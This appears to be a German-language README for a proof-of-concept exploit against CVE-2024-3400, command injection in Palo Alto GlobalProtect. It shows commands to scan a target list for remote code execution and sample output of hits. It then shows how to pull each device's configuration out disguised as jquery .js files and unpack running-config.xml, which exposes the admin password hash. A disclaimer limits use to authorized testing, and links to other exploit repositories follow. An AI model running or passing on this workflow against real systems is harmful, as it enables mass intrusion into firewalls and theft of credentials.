
Proof-of-concept-Exploit für CVE-2024-3400, eine Befehlsinjektion in Palo Alto GlobalProtect. Scannt Ziele, löst RCE aus und ruft Konfigurationsdateien für unbefugten Zugriff ab.
Nur zu Bildungszwecken. Verwenden Sie es nur auf Servern, für die Sie eine Testberechtigung haben.
Abhängigkeiten:
$ pip install rich
Scannen Sie targets.txt:
$ python run.py -f targets.txt -t 10
[-] Sending 102 requests...
[+] Requests sent. Writing check file...
[-] Polling 36...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.ir2qgg4yi5.js...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.xaxdtscd5r.js...
...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.wtn5jvi7y1.js...
[+] Detected RCE: https://[hostname]/global-protect/portal/js/jquery.axfqashdsy.js
[-] Checking https://[hostname]/global-protect/portal/js/jquery.nibf1hcuf8.js...
[-] Sleeping...
Beachten Sie, dass dies bis zu einer Stunde lang wiederholt wird. Wahrscheinlich mehr als nötig, aber das ist in Ordnung.
Konfigurationen abrufen:
$ python get_data.py
Getting https://[hostname]/global-protect/portal/js/jquery.h2lcipjuz7.js...
Getting https://[hostname]/global-protect/portal/js/jquery.68395vb2u8.js...
Getting https://[hostname]/global-protect/portal/js/jquery.ig3sug78m1.js...
...
Getting https://[hostname]/global-protect/portal/js/jquery.w6ty44a6yr.js...
$ mv jquery.w6ty44a6yr.js [hostname].tar.gz
$ tar -xf [hostname].tar.gz
$ cat opt/pancfg/mgmt/saved-configs/running-config.xml
<?xml version="1.0"?>
<config version="11.0.0" urldb="paloaltonetworks" detail-version="11.0.2">
<mgt-config>
<users>
<entry name="admin">
<phash>$5$jwgqcoyx$9...
...
https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan
https://github.com/h4x0r-dz/CVE-2024-3400
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/